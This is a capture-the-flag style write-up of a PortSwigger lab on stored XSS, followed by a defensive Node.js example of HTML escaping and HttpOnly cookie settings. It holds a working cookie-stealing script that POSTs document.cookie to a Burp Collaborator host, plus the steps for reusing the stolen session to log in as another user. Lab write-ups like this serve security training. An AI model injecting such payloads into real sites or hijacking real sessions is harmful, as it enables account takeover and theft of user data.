XSS steal cookie with Burp Collaborator Client

xss

Lab: https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies

We find a comment form where the comment textarea is vulnerable to stored XSS: it allows a `<script></script>` tag to be added and rendered into the post page:

POST /post/comment HTTP/1.1
Host: 0af300520318173cc0b112ad00b500fc.web-security-academy.net
Cookie: session=YGg6YyTDoKJ2p6A7D8zmAfr1GlCrEuUC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 174
Origin: https://0af300520318173cc0b112ad00b500fc.web-security-academy.net
Referer: https://0af300520318173cc0b112ad00b500fc.web-security-academy.net/post?postId=9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

csrf=o9OoCV5mQZR31oqiKBDuMG2NyFzGL0Tr&postId=9&comment=%3cscript%3ealert(1)%3c%2fscript%3e&name=thisname&email=thisemail%40thisemail.com&website=https%3A%2F%2Fthiswebsite.com

Open up Burp Suite Collaborator to generate an oastify domain to listen on. Then add the following script as the comment:

<script>
fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

E.g.:

<script>
fetch('https://kj735uykrnzdps1m0nfqrfl6hxnpbe.oastify.com', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

Post this, then go back to Burp Collaborator and look for an HTTP request whose body contains a new session cookie.

Replace the session cookie in Burp Repeater with the one from Burp Collaborator, right-click >> Request in browser >> In original session. You can now open that link and be logged in with that user's session.
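The lab works because the comment body is echoed into the page unescaped and the session cookie is readable from JavaScript. The following is an added example (not code from the lab or from PortSwigger) showing the two server-side controls that break this chain: HTML-encoding the comment before rendering it, and issuing the session cookie with HttpOnly so document.cookie cannot expose it. It is plain Node.js with no framework; the function names, the placeholder Collaborator hostname and the sample session id are my own.

```javascript
// Added example, not part of the original write-up. Plain Node.js, no framework.
// Function names and sample values are assumptions made for illustration.

// 1. Output encoding. The comment is inserted into HTML, so every character with
//    meaning in HTML is replaced by its entity before it reaches the page.
function escapeHtml(untrusted) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
    '/': '&#x2F;',
  };
  return String(untrusted).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Render a stored comment the way the post page would serve it.
function renderComment(comment) {
  return `<p class="comment">${escapeHtml(comment.name)}: ${escapeHtml(comment.body)}</p>`;
}

// 2. Cookie hardening. HttpOnly removes the cookie from document.cookie, Secure
//    restricts it to HTTPS, SameSite=Lax blunts cross-site requests that carry it.
function buildSessionCookie(sessionId) {
  // The session id must be an opaque random token, never user-controlled data.
  if (!/^[A-Za-z0-9]{16,}$/.test(sessionId)) {
    throw new Error('session id must be an opaque random token');
  }
  return [
    `session=${sessionId}`,
    'Path=/',
    'HttpOnly',
    'Secure',
    'SameSite=Lax',
  ].join('; ');
}

// 3. A small model of what a browser exposes through document.cookie: the
//    name=value pairs of every cookie that was NOT set with HttpOnly.
function cookiesVisibleToScript(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*HttpOnly\b/i.test(h))
    .map((h) => h.split(';')[0].trim())
    .join('; ');
}

// Constructed sample: the shape of the lab payload, stored as a comment.
// The hostname is a placeholder, not a real Collaborator subdomain.
const STORED_COMMENT = {
  name: 'thisname',
  body: "<script>fetch('https://EXAMPLE-COLLABORATOR-SUBDOMAIN', " +
        "{method:'POST',mode:'no-cors',body:document.cookie});</script>",
};

// Constructed sample session id (not a real token).
const SAMPLE_SESSION_ID = 'abcdefghijklmnop0123456789';

// With escaping, the stored payload is served as inert text.
console.log(renderComment(STORED_COMMENT));

// With HttpOnly, the injected fetch would read only non-sensitive cookies.
const responseCookies = [buildSessionCookie(SAMPLE_SESSION_ID), 'theme=dark'];
console.log('document.cookie would read:', JSON.stringify(cookiesVisibleToScript(responseCookies)));
```

Output encoding is the fix for the injection itself; HttpOnly is the control that limits the impact if an encoding bug slips through somewhere else on the site. Both are worth checking when reviewing an application that stores and re-displays user content.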
